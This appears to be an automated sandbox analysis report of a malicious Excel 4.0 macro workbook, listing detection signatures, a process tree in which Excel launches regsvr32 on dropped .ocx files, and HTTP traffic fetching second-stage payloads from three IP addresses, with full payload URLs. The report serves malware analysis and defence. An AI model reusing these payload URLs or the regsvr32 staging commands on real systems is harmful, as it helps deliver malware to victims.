Loading ...

Play interactive tourEdit tour

Windows Analysis Report ClaimCopy-539408676-12022021.xlsb

Overview

General Information

Sample Name:ClaimCopy-539408676-12022021.xlsb
Analysis ID:532685
MD5:4b4aacfd637f34a8c9111d80578bf275
SHA1:86b477fdaa06a4fcd7e863af0b7dc9321b9978e4
SHA256:04a5fd7cd4e3a83f37c9d9b5152a0985278a9d4a6cd749935fdffd1292fdc49f
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2428 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2808 cmdline: regsvr32 C:\ProgramData\Volet1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2908 cmdline: regsvr32 C:\ProgramData\Volet2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2308 cmdline: regsvr32 C:\ProgramData\Volet3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1268 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2248 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 344 cmdline: regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 C:\ProgramData\Volet1.ocx, CommandLine: regsvr32 C:\ProgramData\Volet1.ocx, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2428, ProcessCommandLine: regsvr32 C:\ProgramData\Volet1.ocx, ProcessId: 2808

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: ClaimCopy-539408676-12022021.xlsbVirustotal: Detection: 10%Perma Link
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.82.126.78:80
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 185.82.126.78:80
Source: global trafficHTTP traffic detected: GET /533792932717.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.82.126.78Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /533792932717.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 158.69.133.78Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /533792932717.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.142.211.62Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /533792932717.dat2 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.142.211.62Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /533792932717.dat2 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.82.126.78Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /533792932717.dat2 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 158.69.133.78Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
Source: unknownTCP traffic detected without corresponding DNS query: 45.142.211.62
Source: unknownTCP traffic detected without corresponding DNS query: 185.82.126.78
Source: unknownTCP traffic detected without corresponding DNS query: 158.69.133.78
Source: EXCEL.EXE, 00000000.00000002.713743948.0000000005A15000.00000004.00000001.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com_ equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.710982551.0000000004F40000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.708969859.0000000004940000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.709218648.00000000049B0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EXCEL.EXE, 00000000.00000002.713743948.0000000005A15000.00000004.00000001.sdmpString found in binary or memory: ookie:user@www.linkedin.com/LMEM@@^ equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.713743948.0000000005A15000.00000004.00000001.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:10:25 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:10:26 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:10:30 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:10:30 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:10:30 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 02 Dec 2021 15:10:30 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: EXCEL.EXE, 00000000.00000002.710595271.0000000004E37000.00000004.00000001.sdmpString found in binary or memory: http://158.69.133.78/533792932717.dat
Source: EXCEL.EXE, 00000000.00000002.714339127.0000000007E40000.00000004.00000001.sdmpString found in binary or memory: http://158.69.133.78/533792932717.dat2
Source: EXCEL.EXE, 00000000.00000002.710595271.0000000004E37000.00000004.00000001.sdmpString found in binary or memory: http://185.82.126.78/533792932717.dat
Source: EXCEL.EXE, 00000000.00000002.714339127.0000000007E40000.00000004.00000001.sdmpString found in binary or memory: http://185.82.126.78/533792932717.dat2
Source: EXCEL.EXE, 00000000.00000002.714339127.0000000007E40000.00000004.00000001.sdmpString found in binary or memory: http://185.82.126.78/533792932717.dat2bus
Source: EXCEL.EXE, 00000000.00000002.710595271.0000000004E37000.00000004.00000001.sdmpString found in binary or memory: http://45.142.211.62/533792932717.dat
Source: EXCEL.EXE, 00000000.00000002.714339127.0000000007E40000.00000004.00000001.sdmpString found in binary or memory: http://45.142.211.62/533792932717.dat2
Source: EXCEL.EXE, 00000000.00000002.714339127.0000000007E40000.00000004.00000001.sdmpString found in binary or memory: http://45.142.211.62/533792932717.dat2nter
Source: EXCEL.EXE, 00000000.00000002.710982551.0000000004F40000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.708969859.0000000004940000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.709218648.00000000049B0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
